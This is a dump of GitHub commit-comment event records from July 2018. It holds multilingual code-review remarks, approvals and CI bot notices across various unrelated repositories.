{"id":"7927590433","type":"CommitCommentEvent","actor":{"login":"ruthmaclean"},"repo":{"name":"pivotal-cf/docs-on-demand-service-broker"},"payload":{"comment":{"id":29618192,"position":null,"line":null,"path":null,"commit_id":"f4c89b087ef64db187d6f921f61ec8629623792d","created_at":"2018-07-06T08:35:57Z","updated_at":"2018-07-06T08:35:57Z","author_association":"COLLABORATOR","body":"approved"}},"created_at":"2018-07-06T08:35:57Z"}
{"id":"7927591136","type":"CommitCommentEvent","actor":{"login":"ruthmaclean"},"repo":{"name":"pivotal-cf/docs-on-demand-service-broker"},"payload":{"comment":{"id":29618194,"position":null,"line":null,"path":null,"commit_id":"f4c89b087ef64db187d6f921f61ec8629623792d","created_at":"2018-07-06T08:36:06Z","updated_at":"2018-07-06T08:36:06Z","author_association":"COLLABORATOR","body":"please merge to master @pivotal-cf/docs "}},"created_at":"2018-07-06T08:36:06Z"}
{"id":"7927593152","type":"CommitCommentEvent","actor":{"login":"ruthmaclean"},"repo":{"name":"pivotal-cf/docs-on-demand-service-broker"},"payload":{"comment":{"id":29618199,"position":null,"line":null,"path":null,"commit_id":"d01074702136101a1a9e80e88ed3008b316ea5bc","created_at":"2018-07-06T08:36:33Z","updated_at":"2018-07-06T08:36:33Z","author_association":"COLLABORATOR","body":"approved"}},"created_at":"2018-07-06T08:36:33Z"}
{"id":"7927594178","type":"CommitCommentEvent","actor":{"login":"ruthmaclean"},"repo":{"name":"pivotal-cf/docs-on-demand-service-broker"},"payload":{"comment":{"id":29618204,"position":null,"line":null,"path":null,"commit_id":"d01074702136101a1a9e80e88ed3008b316ea5bc","created_at":"2018-07-06T08:36:46Z","updated_at":"2018-07-06T08:36:46Z","author_association":"COLLABORATOR","body":"please merge to master @pivotal-cf/docs "}},"created_at":"2018-07-06T08:36:46Z"}
{"id":"7927601380","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618215,"position":30,"line":30,"path":"client/src/layouts/StoreSelector/index.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:38:17Z","updated_at":"2018-07-06T08:38:17Z","author_association":"NONE","body":"Il existe plusieurs façons de tester si un array est vide, l'important est de rester cohérent.\r\n\r\nOn voit d'abord `!this.props.selectedStores.length` pour tester si l'array est vide, puis `this.props.selectedStores.length !== 0` pour tester si l'array n'est pas vide.\r\n\r\nOn aurait préféré :\r\n`!this.props.selectedStores.length` / `this.props.selectedStores.length` (ou `!!`)\r\n`this.props.selectedStores.length !== 0` / `this.props.selectedStores.length > 0`"}},"created_at":"2018-07-06T08:38:17Z"}
{"id":"7927604907","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618216,"position":44,"line":44,"path":"client/src/css/reset.css","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:39:05Z","updated_at":"2018-07-06T08:39:05Z","author_association":"NONE","body":"Très bien"}},"created_at":"2018-07-06T08:39:05Z"}
{"id":"7927608518","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"parse-community/Parse-SDK-JS"},"payload":{"comment":{"id":29618223,"position":9,"line":6,"path":"integration/package.json","commit_id":"c594faaca9a17dc82edf7adc255e1aab46568a17","created_at":"2018-07-06T08:39:51Z","updated_at":"2018-07-06T08:39:51Z","author_association":"MEMBER","body":"Yep sounds like it works as expected now with latest versions of npm :)"}},"created_at":"2018-07-06T08:39:51Z"}
{"id":"7927610123","type":"CommitCommentEvent","actor":{"login":"LuciSintra"},"repo":{"name":"Sintraconsulting/sintra-css"},"payload":{"comment":{"id":29618226,"position":null,"line":null,"path":null,"commit_id":"0fc40eebc873efa5acd91c14187725730bc2fe6a","created_at":"2018-07-06T08:40:12Z","updated_at":"2018-07-06T08:40:12Z","author_association":"CONTRIBUTOR","body":"perullo container"}},"created_at":"2018-07-06T08:40:12Z"}
{"id":"7927612257","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"joye-ramone/na-ogsr"},"payload":{"comment":{"id":29618229,"position":3,"line":50,"path":"gamedata/scripts/se_zones.script","commit_id":"f539efd75133355ab94cab32ecdba15131a8ac6f","created_at":"2018-07-06T08:40:36Z","updated_at":"2018-07-06T08:40:36Z","author_association":"NONE","body":"Не, ну если вылетает внутри метода базового движкового класса - как бы надо разбираться, а не убирать вызов. По-моему, этого нельзя вообще делать в данном случае.\r\nСкинь стек трейсбек вылета, там не внутри функции spawn_artefact упало, случайно?"}},"created_at":"2018-07-06T08:40:36Z"}
{"id":"7927615338","type":"CommitCommentEvent","actor":{"login":"chriscool"},"repo":{"name":"telezhnaya/git"},"payload":{"comment":{"id":29618231,"position":78,"line":861,"path":"ref-filter.c","commit_id":"edcedffa8aa854e55188d132f6f6c5daf5dd7322","created_at":"2018-07-06T08:41:18Z","updated_at":"2018-07-06T08:41:18Z","author_association":"NONE","body":"Not sure about `const` before `struct expand_data *oi`. I think we don't usually use them before struct pointers."}},"created_at":"2018-07-06T08:41:18Z"}
{"id":"7927619484","type":"CommitCommentEvent","actor":{"login":"tungntnp"},"repo":{"name":"tungntnp/project1"},"payload":{"comment":{"id":29618238,"position":null,"line":null,"path":null,"commit_id":"1c7d96f062a8469d0a73a2ada668b08b4666c991","created_at":"2018-07-06T08:42:10Z","updated_at":"2018-07-06T08:42:10Z","author_association":"OWNER","body":"tao thu trnag github"}},"created_at":"2018-07-06T08:42:10Z"}
{"id":"7927620894","type":"CommitCommentEvent","actor":{"login":"globaltoken"},"repo":{"name":"globaltoken/node-open-mining-portal"},"payload":{"comment":{"id":29618242,"position":null,"line":null,"path":null,"commit_id":"8a62f6a75b838ea16fcf7d9f7ffda0b14b4576b2","created_at":"2018-07-06T08:42:27Z","updated_at":"2018-07-06T08:42:27Z","author_association":"OWNER","body":"@857487 Try my newest commit now pls.\r\nLet me know if it works please."}},"created_at":"2018-07-06T08:42:27Z"}
{"id":"7927621118","type":"CommitCommentEvent","actor":{"login":"rinti"},"repo":{"name":"Frojd/Wagtail-Boilerplate"},"payload":{"comment":{"id":29618243,"position":11,"line":29,"path":"hooks/post_gen_project.py","commit_id":"2cdd31c4fb34b18aa491e0dc4d59e6f6d046c85e","created_at":"2018-07-06T08:42:31Z","updated_at":"2018-07-06T08:42:31Z","author_association":"MEMBER","body":"Detta kommer inte alltid funka, t.ex.\r\n\r\n```py\r\n>>> sorted([\"1\", \"2\", \"11\", \"3\", \"4\"])\r\n['1', '11', '2', '3', '4']\r\n```"}},"created_at":"2018-07-06T08:42:31Z"}
{"id":"7927629063","type":"CommitCommentEvent","actor":{"login":"BAAAKA"},"repo":{"name":"BAAAKA/Vwin"},"payload":{"comment":{"id":29618260,"position":null,"line":null,"path":null,"commit_id":"cb7438099fa88664a62ddd5e530a078a4aed895f","created_at":"2018-07-06T08:44:11Z","updated_at":"2018-07-06T08:44:11Z","author_association":"OWNER","body":"Buuhhh, your codu sux!"}},"created_at":"2018-07-06T08:44:11Z"}
{"id":"7927631074","type":"CommitCommentEvent","actor":{"login":"daivadaiva"},"repo":{"name":"gedasprojektai/front-end-one-"},"payload":{"comment":{"id":29618266,"position":2,"line":4,"path":"Values and Approach Principles.txt","commit_id":"3fe47f5f2e51b712f8c3196cc52ae032a04fb33d","created_at":"2018-07-06T08:44:35Z","updated_at":"2018-07-06T08:44:35Z","author_association":"COLLABORATOR","body":"I really like this one. We shouldn't be distracted. But at the same time we have to distribute works."}},"created_at":"2018-07-06T08:44:35Z"}
{"id":"7927634242","type":"CommitCommentEvent","actor":{"login":"CodeRhyno"},"repo":{"name":"publiclab/plots2"},"payload":{"comment":{"id":29618275,"position":null,"line":null,"path":null,"commit_id":"6fd3037dff6959f1659018b1035cbe28e5cee9de","created_at":"2018-07-06T08:45:16Z","updated_at":"2018-07-06T08:45:16Z","author_association":"NONE","body":"Removed the extra div."}},"created_at":"2018-07-06T08:45:16Z"}
{"id":"7927637645","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29618280,"position":null,"line":null,"path":null,"commit_id":"108e90e8d93f281709a805a5c7f586391e6a0f97","created_at":"2018-07-06T08:45:54Z","updated_at":"2018-07-06T08:45:54Z","author_association":"COLLABORATOR","body":"Puzzle `400-9e938816` disappeared from [`src/main/java/com/zerocracy/tk/TkDump.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/tk/TkDump.java), that's why I closed #765. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-06T08:45:54Z"}
{"id":"7927638640","type":"CommitCommentEvent","actor":{"login":"rinti"},"repo":{"name":"Frojd/Wagtail-Boilerplate"},"payload":{"comment":{"id":29618284,"position":11,"line":29,"path":"hooks/post_gen_project.py","commit_id":"2cdd31c4fb34b18aa491e0dc4d59e6f6d046c85e","created_at":"2018-07-06T08:46:07Z","updated_at":"2018-07-06T08:46:07Z","author_association":"MEMBER","body":"Does `git tag -l | sort -V | tail -1` work on windows?"}},"created_at":"2018-07-06T08:46:07Z"}
{"id":"7927640284","type":"CommitCommentEvent","actor":{"login":"bartavelle"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":29618286,"position":null,"line":null,"path":null,"commit_id":"dda552c7e602661c5b9700229cfb4dee6cac7452","created_at":"2018-07-06T08:46:25Z","updated_at":"2018-07-06T08:46:25Z","author_association":"OWNER","body":"I was fixing the 8.0 build :/"}},"created_at":"2018-07-06T08:46:25Z"}
{"id":"7927652038","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618306,"position":36,"line":36,"path":"client/src/containers/StoreSelector.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:48:52Z","updated_at":"2018-07-06T08:48:52Z","author_association":"NONE","body":"Quand j'ai une condition du type `this.props.selectedStores[index] === true`, j'aime bien me poser la question de savoir si ce n'est pas plus clair en utilisant un nommage qui  rend explicite le fait que la variable est un booléen et de l'utiliser telle quelle :\r\n```javascript\r\nif (this.props.isSelectedAt[index]) {}\r\n```\r\n\r\nJ'aime bien aussi limiter le niveau d'indentation :\r\n```javascript\r\nif (!this.props.isSelectedAt[index]) return;\r\nreturn {\r\n  ...store,\r\n  index: index,\r\n}\r\n```\r\n\r\nOn aurait aussi pu faire usage d'un ternaire.\r\n\r\nPour ce qui est du `.filter((item) => item)`, c'est toujours apprécié un petit commentaire pour expliqué ce qu'il se passe."}},"created_at":"2018-07-06T08:48:52Z"}
{"id":"7927659387","type":"CommitCommentEvent","actor":{"login":"iksototh"},"repo":{"name":"Frojd/Wagtail-Boilerplate"},"payload":{"comment":{"id":29618319,"position":11,"line":29,"path":"hooks/post_gen_project.py","commit_id":"2cdd31c4fb34b18aa491e0dc4d59e6f6d046c85e","created_at":"2018-07-06T08:50:21Z","updated_at":"2018-07-06T08:50:21Z","author_association":"MEMBER","body":"Hm, this maybe instead:\r\ngit tag -l --sort=version:refname | tail -1"}},"created_at":"2018-07-06T08:50:21Z"}
{"id":"7927659441","type":"CommitCommentEvent","actor":{"login":"gctucker"},"repo":{"name":"ana/lava-ci-staging"},"payload":{"comment":{"id":29618321,"position":5,"line":19,"path":"templates/usb/usb.jinja2","commit_id":"00ebc55093795a6cf1dfee7a2c518719b10cdd88","created_at":"2018-07-06T08:50:21Z","updated_at":"2018-07-06T08:50:21Z","author_association":"NONE","body":"Or even just once.  I don't know how likely it is for devices to fail to resume after several attempts, I would have thought that a broken suspend/resume driver implementation would fail every time."}},"created_at":"2018-07-06T08:50:21Z"}
{"id":"7927662053","type":"CommitCommentEvent","actor":{"login":"amtlib-dot-dll"},"repo":{"name":"LineageOS/lineage_wiki"},"payload":{"comment":{"id":29618328,"position":6,"line":14,"path":"_data/devices/lithium.yml","commit_id":"c900944519705fde7744ad88b274c8ff043860ca","created_at":"2018-07-06T08:50:54Z","updated_at":"2018-07-06T08:50:54Z","author_association":"NONE","body":"Thanks @blunden :+1: hope it to be merged into the mainstream TWRP"}},"created_at":"2018-07-06T08:50:54Z"}
{"id":"7927663720","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29618331,"position":null,"line":null,"path":null,"commit_id":"9bbdcf5621f7e5d210160e583c0d2ab122de3054","created_at":"2018-07-06T08:51:14Z","updated_at":"2018-07-06T08:51:14Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://752b6568.ngrok.io/ui#review:id=375)"}},"created_at":"2018-07-06T08:51:14Z"}
{"id":"7927663977","type":"CommitCommentEvent","actor":{"login":"Urkman"},"repo":{"name":"dennisweissmann/DeviceKit"},"payload":{"comment":{"id":29618334,"position":null,"line":null,"path":null,"commit_id":"26c8721dadb2c50b24ad859d6728f32f12ec2f53","created_at":"2018-07-06T08:51:17Z","updated_at":"2018-07-06T08:51:17Z","author_association":"NONE","body":"It's bad to do Swift 4.2 changes on master branch..."}},"created_at":"2018-07-06T08:51:17Z"}
{"id":"7927667851","type":"CommitCommentEvent","actor":{"login":"chensi77"},"repo":{"name":"chensi77/coding-exercises"},"payload":{"comment":{"id":29618344,"position":null,"line":null,"path":null,"commit_id":"bc5a6edb3ac9e59b2a3fa23a37b2c822abfbac69","created_at":"2018-07-06T08:52:06Z","updated_at":"2018-07-06T08:52:06Z","author_association":"OWNER","body":"第三次编程练习"}},"created_at":"2018-07-06T08:52:06Z"}
{"id":"7927669948","type":"CommitCommentEvent","actor":{"login":"daivadaiva"},"repo":{"name":"gedasprojektai/front-end-one-"},"payload":{"comment":{"id":29618355,"position":2,"line":12,"path":"Values and Approach Principles.txt","commit_id":"00c3ead2c520d1c6fb1ecae4ba26562b65ae1781","created_at":"2018-07-06T08:52:30Z","updated_at":"2018-07-06T08:52:30Z","author_association":"COLLABORATOR","body":"I agree!"}},"created_at":"2018-07-06T08:52:30Z"}
{"id":"7927673658","type":"CommitCommentEvent","actor":{"login":"dirsky"},"repo":{"name":"dirsky/GitToday"},"payload":{"comment":{"id":29618363,"position":3,"line":3,"path":"ReadMe.txt","commit_id":"4d4d50b59a07b2dd69b1038480bd209b0e812e2d","created_at":"2018-07-06T08:53:16Z","updated_at":"2018-07-06T08:53:16Z","author_association":"OWNER","body":"what"}},"created_at":"2018-07-06T08:53:16Z"}
{"id":"7927673996","type":"CommitCommentEvent","actor":{"login":"junglue"},"repo":{"name":"Glue-Software-Engineering-AG/OpenPDF"},"payload":{"comment":{"id":29618364,"position":null,"line":null,"path":null,"commit_id":"be313daae4c6f07901526cef16ccf6b75a5f80ad","created_at":"2018-07-06T08:53:20Z","updated_at":"2018-07-06T08:53:20Z","author_association":"COLLABORATOR","body":"We have added the changes to embed LTV information. However, the methods are called directly by us and have therefore not been tested with other parts of OpenPDF."}},"created_at":"2018-07-06T08:53:20Z"}
{"id":"7927682115","type":"CommitCommentEvent","actor":{"login":"chriscool"},"repo":{"name":"telezhnaya/git"},"payload":{"comment":{"id":29618382,"position":null,"line":null,"path":null,"commit_id":"54bd259bbb8417d51231013cc40b680172f46cbd","created_at":"2018-07-06T08:55:00Z","updated_at":"2018-07-06T08:55:00Z","author_association":"NONE","body":"Maybe the commit message could be improved in the following way:\r\n\r\n  - tell that the goal is to improve performance by avoiding calling expensive functions when we don't need the information they provide or when we could get it by using a cheaper function\r\n  - tell that it is only about object data\r\n  - tell that it is stored in valid_atoms because it depends on the atoms we are interested in"}},"created_at":"2018-07-06T08:55:00Z"}
{"id":"7927684958","type":"CommitCommentEvent","actor":{"login":"dcsaszar"},"repo":{"name":"Scrivito/scrivito_example_app_js"},"payload":{"comment":{"id":29618391,"position":4,"line":16,"path":"src/Objs/Job/JobEditingConfig.js","commit_id":"11d4dd0e0295862c52dc3f7efd3295cf8113722a","created_at":"2018-07-06T08:55:34Z","updated_at":"2018-07-06T08:55:34Z","author_association":"CONTRIBUTOR","body":"* [ ] 60b5f5b1a016dc7c6943849d974685265043045c shows a different title and description, probably more appropriate\r\n\r\nI'm a bit 😕 by two commits removing this attribute editing config."}},"created_at":"2018-07-06T08:55:34Z"}
{"id":"7927690231","type":"CommitCommentEvent","actor":{"login":"blunden"},"repo":{"name":"LineageOS/lineage_wiki"},"payload":{"comment":{"id":29618416,"position":6,"line":14,"path":"_data/devices/lithium.yml","commit_id":"c900944519705fde7744ad88b274c8ff043860ca","created_at":"2018-07-06T08:56:39Z","updated_at":"2018-07-06T08:56:39Z","author_association":"CONTRIBUTOR","body":"@amtlib-dot-dll If you want to help, please give my tree a try to make sure the previous issue wasn't build environment related."}},"created_at":"2018-07-06T08:56:39Z"}
{"id":"7927690311","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29618417,"position":15,"line":15,"path":"ding_language.module","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T08:56:40Z","updated_at":"2018-07-06T08:56:40Z","author_association":"NONE","body":"No, I mean the CT views. The 2 displays in ding_eresource, all content displays in ding_event/ding_library/ding_news and maybe the ding_node_search?"}},"created_at":"2018-07-06T08:56:40Z"}
{"id":"7927691740","type":"CommitCommentEvent","actor":{"login":"dennisweissmann"},"repo":{"name":"dennisweissmann/DeviceKit"},"payload":{"comment":{"id":29618422,"position":null,"line":null,"path":null,"commit_id":"26c8721dadb2c50b24ad859d6728f32f12ec2f53","created_at":"2018-07-06T08:56:59Z","updated_at":"2018-07-06T08:56:59Z","author_association":"OWNER","body":"Why? master is the development branch ... I'll create a new branch for Swift 4/4.1 shortly (branching off the commit before this one)."}},"created_at":"2018-07-06T08:56:59Z"}
{"id":"7927692207","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618425,"position":12,"line":12,"path":"client/src/actions/export.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:57:05Z","updated_at":"2018-07-06T08:57:05Z","author_association":"NONE","body":"On perd les virgules, c'est dommage !"}},"created_at":"2018-07-06T08:57:05Z"}
{"id":"7927697953","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29618437,"position":null,"line":null,"path":null,"commit_id":"351e7f60e093f1a72c8267ac982daa723715980a","created_at":"2018-07-06T08:58:16Z","updated_at":"2018-07-06T08:58:16Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/9/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : java.lang.Exception: Skipping the rest for now\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/9//console)\n"}},"created_at":"2018-07-06T08:58:16Z"}
{"id":"7927708293","type":"CommitCommentEvent","actor":{"login":"geraldvillorente"},"repo":{"name":"geraldvillorente/build-tools-demo"},"payload":{"comment":{"id":29618468,"position":null,"line":null,"path":null,"commit_id":"8c106c4eeb62b05880430d7e49efe24d0c39d06a","created_at":"2018-07-06T09:00:21Z","updated_at":"2018-07-06T09:00:21Z","author_association":"OWNER","body":"Created multidev environment [build-tools-demo#ci-4](https://dashboard.pantheon.io/sites/298d3692-c016-408b-972b-854d0b0302a9#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-build-tools-demo.pantheonsite.io/)"}},"created_at":"2018-07-06T09:00:21Z"}
{"id":"7927712497","type":"CommitCommentEvent","actor":{"login":"dedei211"},"repo":{"name":"dedei211/test"},"payload":{"comment":{"id":29618478,"position":null,"line":null,"path":null,"commit_id":"34db05486214ccbf5e97f1e48527c32fa181c9b5","created_at":"2018-07-06T09:01:07Z","updated_at":"2018-07-06T09:01:07Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-06T09:01:07Z"}
{"id":"7927714910","type":"CommitCommentEvent","actor":{"login":"nicholaswzk"},"repo":{"name":"nicholasleezt/gallerie"},"payload":{"comment":{"id":29618482,"position":null,"line":null,"path":null,"commit_id":"914b047138848f1e9625283cd501ba443fe2d4ff","created_at":"2018-07-06T09:01:34Z","updated_at":"2018-07-06T09:01:34Z","author_association":"COLLABORATOR","body":"also removed Hero image to make way for introduction\r\n"}},"created_at":"2018-07-06T09:01:34Z"}
{"id":"7927727059","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618508,"position":null,"line":null,"path":null,"commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T09:03:58Z","updated_at":"2018-07-06T09:03:58Z","author_association":"NONE","body":"Bravo pour ce test, j'apprécie beaucoup lire ton code !\r\n\r\nJe n'ai pas parfaitement saisi l'usage qui est fait du `hot-reloader` et de `history` : par exemple, est-ce que le store se re-peuple avec le hot-reloading de webpack, de sorte que la sélection des magasins est conservée ? (je n'ai pas réussi à le faire fonctionner).\r\n\r\nSur la structure de données, je suis un peu gêné par le fait qu'il y ait un même nommage pour désigner `selectedStore` dans le store redux, qui est un dictionnaire `index: boolean`, et `selectedStore` dans le state React, qui est un array d'objet `store`. Ça prête à confusion.\r\n\r\nOn aurait pu envisager un autre structure de donnée pour garder trace des stores sélectionnées, que penses-tu des [Set](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Set) ?\r\n\r\nIl y a pas mal de `=== true`, comment te positionnes-tu là-dessus ?\r\n\r\nComment aurais-tu tester ton code ?"}},"created_at":"2018-07-06T09:03:58Z"}
{"id":"7927732689","type":"CommitCommentEvent","actor":{"login":"uBlock-user"},"repo":{"name":"uBlock-user/uBO-Personal-Filters"},"payload":{"comment":{"id":29618518,"position":null,"line":null,"path":null,"commit_id":"ac7dceaa6109248479943882c3375e615675d823","created_at":"2018-07-06T09:05:10Z","updated_at":"2018-07-06T09:05:10Z","author_association":"OWNER","body":"kissanime regex"}},"created_at":"2018-07-06T09:05:10Z"}
{"id":"7927733831","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29618521,"position":null,"line":null,"path":null,"commit_id":"63d0b2d2c0542d020d29fa264d190b22e08a5c7e","created_at":"2018-07-06T09:05:23Z","updated_at":"2018-07-06T09:05:23Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://752b6568.ngrok.io/ui#review:id=376)"}},"created_at":"2018-07-06T09:05:23Z"}
{"id":"7927745403","type":"CommitCommentEvent","actor":{"login":"funny-falcon"},"repo":{"name":"socketry/async"},"payload":{"comment":{"id":29618557,"position":null,"line":null,"path":null,"commit_id":"f84df8d7ea9ab2aa7b1dfa07aa17ce60c5522e41","created_at":"2018-07-06T09:07:51Z","updated_at":"2018-07-06T09:07:51Z","author_association":"CONTRIBUTOR","body":"It is possible to use to_enum. It is not possible to use enumerator as external iterator it is uses reactor. And `zip` method can use external iterator mode implicitely."}},"created_at":"2018-07-06T09:07:51Z"}
{"id":"7927750970","type":"CommitCommentEvent","actor":{"login":"ioquatix"},"repo":{"name":"socketry/async"},"payload":{"comment":{"id":29618580,"position":null,"line":null,"path":null,"commit_id":"f84df8d7ea9ab2aa7b1dfa07aa17ce60c5522e41","created_at":"2018-07-06T09:09:01Z","updated_at":"2018-07-06T09:09:01Z","author_association":"MEMBER","body":"I see, it's tricky but do you want to update the documentation regarding what is safe and what is not?"}},"created_at":"2018-07-06T09:09:01Z"}
{"id":"7927751933","type":"CommitCommentEvent","actor":{"login":"libingshen"},"repo":{"name":"libingshen/springannotation"},"payload":{"comment":{"id":29618582,"position":10,"line":10,"path":"src/main/java/com/atguigu/condition/MyImportBeanDefinitionRegistrar.java","commit_id":"208b9133d74e59ef9d464347fc6c11e95bb3fd5b","created_at":"2018-07-06T09:09:13Z","updated_at":"2018-07-06T09:09:13Z","author_association":"OWNER","body":"//手动注册bean到容器中"}},"created_at":"2018-07-06T09:09:13Z"}
{"id":"7927754266","type":"CommitCommentEvent","actor":{"login":"petur215"},"repo":{"name":"petur215/HelloWorldNav"},"payload":{"comment":{"id":29618588,"position":null,"line":null,"path":null,"commit_id":"3b455a5750d4447678cdb04cc2a723266332eae0","created_at":"2018-07-06T09:09:42Z","updated_at":"2018-07-06T09:09:42Z","author_association":"OWNER","body":"heyrðu pétur minn er þetta ekki vitlaust"}},"created_at":"2018-07-06T09:09:42Z"}
{"id":"7927774046","type":"CommitCommentEvent","actor":{"login":"xiahanting"},"repo":{"name":"xiahanting/CRUD"},"payload":{"comment":{"id":29618627,"position":null,"line":null,"path":null,"commit_id":"d3525647a7bf9ced35f6e72a9b9b29d4bc679436","created_at":"2018-07-06T09:13:36Z","updated_at":"2018-07-06T09:13:36Z","author_association":"OWNER","body":"逆向工程配置文件"}},"created_at":"2018-07-06T09:13:36Z"}
{"id":"7927780633","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29618647,"position":null,"line":null,"path":null,"commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T09:14:57Z","updated_at":"2018-07-06T09:14:57Z","author_association":"NONE","body":"It's hard to make them generic/global since they will differ from site to site, however they will be reverted for sites that does not have `gronbib_frontend` (which is only 1 client). Can we make `ding_language` module require configuration of `language_*` variables somehow, or make some rule that they should be defined in `settings.php` instead?"}},"created_at":"2018-07-06T09:14:57Z"}
{"id":"7927785011","type":"CommitCommentEvent","actor":{"login":"skabbaj"},"repo":{"name":"skabbaj/mongithub"},"payload":{"comment":{"id":29618660,"position":null,"line":null,"path":null,"commit_id":"2cc5fd50297f9ac2428e3fcc087cf54ef6d14282","created_at":"2018-07-06T09:15:52Z","updated_at":"2018-07-06T09:15:52Z","author_association":"OWNER","body":"[Dockfile.txt](https://github.com/skabbaj/mongithub/files/2169791/Dockfile.txt)\r\n"}},"created_at":"2018-07-06T09:15:52Z"}
{"id":"7927786760","type":"CommitCommentEvent","actor":{"login":"liangchengtong"},"repo":{"name":"tekintian/wechat_shop"},"payload":{"comment":{"id":29618663,"position":null,"line":null,"path":null,"commit_id":"345b1983c840a7df96950f1f4d24f80758240fa7","created_at":"2018-07-06T09:16:13Z","updated_at":"2018-07-06T09:16:13Z","author_association":"NONE","body":"数据库在哪里下载呢?\r\n"}},"created_at":"2018-07-06T09:16:13Z"}
{"id":"7927786982","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"sbrodin/phpmyadmin"},"payload":{"comment":{"id":29618665,"position":null,"line":null,"path":null,"commit_id":"bdf0498bf4edda92a97f0938feee6c7b01d67130","created_at":"2018-07-06T09:16:16Z","updated_at":"2018-07-06T09:16:16Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-06T09:16:16Z"}
{"id":"7927792667","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29618675,"position":null,"line":null,"path":null,"commit_id":"6745e4fdcaad638271f930092c0c0db3de2e253f","created_at":"2018-07-06T09:17:29Z","updated_at":"2018-07-06T09:17:29Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/6745e4fdcaad638271f930092c0c0db3de2e253f#commitcomment-29616309) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/80fe1ef0ef031e2c2a280d4e7a5ea11cd9f6d86a/daily_2018_7_6/report.md). cc @ararslan"}},"created_at":"2018-07-06T09:17:29Z"}
{"id":"7927795945","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"MrFenril/mapotempo-web"},"payload":{"comment":{"id":29618679,"position":5,"line":32,"path":"app/templates/routes/_edit.mustache","commit_id":"1efdb19c2c38b689aab10b1c3342bd0d6f215856","created_at":"2018-07-06T09:18:10Z","updated_at":"2018-07-06T09:18:10Z","author_association":"NONE","body":"call this `route-btn-group`"}},"created_at":"2018-07-06T09:18:10Z"}
{"id":"7927796224","type":"CommitCommentEvent","actor":{"login":"hejipalanski"},"repo":{"name":"hejipalanski/cip"},"payload":{"comment":{"id":29618681,"position":52,"line":64,"path":"source/server.js","commit_id":"8d285f5bc691c07a03b042fdcb7f7516bfd33da9","created_at":"2018-07-06T09:18:13Z","updated_at":"2018-07-06T09:18:13Z","author_association":"OWNER","body":"forgot to delete trailing spaces"}},"created_at":"2018-07-06T09:18:13Z"}
